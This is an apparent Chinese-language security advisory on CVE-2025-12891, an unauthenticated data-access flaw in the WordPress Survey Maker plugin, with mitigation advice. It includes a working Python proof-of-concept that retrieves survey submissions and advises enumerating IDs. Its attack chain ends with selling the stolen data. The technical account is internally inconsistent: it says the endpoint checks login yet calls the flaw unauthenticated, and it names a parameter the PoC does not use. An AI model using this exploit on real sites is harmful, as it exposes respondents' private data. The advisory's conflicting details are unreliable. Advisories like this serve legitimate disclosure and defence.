WordPress Survey Maker插件未授权访问漏洞 (CVE-2025-12891)

漏洞信息

漏洞编号

CVE-2025-12891

漏洞类型

未授权访问/越权漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Survey Maker WordPress Plugin

漏洞概述

Survey Maker是WordPress平台上广泛使用的调查问卷创建插件，允许用户轻松创建和管理各类在线调查。2025年11月，安全研究人员发现该插件存在严重的安全漏洞，攻击者可在无需任何认证的情况下访问敏感的调查提交数据。漏洞根源在于插件的AJAX端点'ays_survey_show_results'缺少权限验证检查，任何未认证用户都可以通过构造恶意请求来获取系统中所有调查问卷的提交结果。这些数据可能包含用户隐私信息、业务敏感数据等。统计显示，该插件在WordPress官方插件库中有超过30,000次安装，受影响用户群体广泛。漏洞已被标记为中等严重程度（CVSS 5.3），但考虑到数据泄露的潜在影响范围，实际危害不容忽视。建议所有使用该插件的用户立即检查并更新到最新版本。

技术细节

漏洞位于Survey Maker插件的admin/class-survey-maker-admin.php文件中，具体在处理'ays_survey_show_results' AJAX请求的逻辑中。问题在于该端点仅验证了用户是否已登录WordPress后台，但未检查用户是否具有查看调查结果的权限。正常情况下，查看调查结果显示功能应该仅对管理员角色开放，但开发者遗漏了current_user_can()或类似的能力检查函数。攻击者只需构造一个带有survey_id参数的POST请求到/wp-admin/admin-ajax.php端点，指定action参数为'ays_survey_show_results'，即可绕过认证限制获取指定调查的所有提交数据。漏洞利用无需任何特殊工具或技术知识，属于典型的OWASP Top 10中的'失效的身份验证'类别。攻击者可通过遍历不同的survey_id值来批量获取系统中所有调查问卷的数据内容。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress Survey Maker插件版本

STEP 2

步骤2

构造针对ays_survey_show_results AJAX端点的恶意请求，无需任何认证凭证

STEP 3

步骤3

通过遍历不同的survey_id参数值，批量获取系统中各调查问卷的提交数据

STEP 4

步骤4

收集并整理泄露的用户隐私信息、调查答案等敏感数据

STEP 5

步骤5

利用获取的数据进行进一步攻击或出售给第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12891 PoC - Survey Maker Unauthenticated Survey Results Access
# Affected: Survey Maker plugin <= 5.1.9.4 for WordPress

import requests
import sys

TARGET_URL = input("Enter WordPress URL: ").rstrip('/')
SURVEY_ID = input("Enter Survey ID (numeric): ")

endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
}

# Craft the malicious request without any authentication
data = {
    'action': 'ays_survey_show_results',
    'id': SURVEY_ID
}

print(f"[*] Sending request to {endpoint}")
print(f"[*] Target Survey ID: {SURVEY_ID}")

try:
    response = requests.post(endpoint, data=data, headers=headers, timeout=30)
    
    if response.status_code == 200:
        print(f"[+] Request successful!")
        print(f"[+] Response length: {len(response.text)} bytes")
        print("\n--- Response Preview ---")
        print(response.text[:1000])
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

# Note: Enumerate survey IDs to access all survey submissions
print("\n[!] To enumerate all surveys, iterate through different ID values")

影响范围

Survey Maker WordPress Plugin <= 5.1.9.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：1) 使用WordPress安全插件限制未认证用户对admin-ajax.php端点的访问；2) 临时禁用调查结果显示功能；3) 部署WAF规则过滤异常的survey_id请求参数；4) 监控服务器日志关注异常的AJAX请求模式。建议尽快完成版本升级以彻底消除安全风险。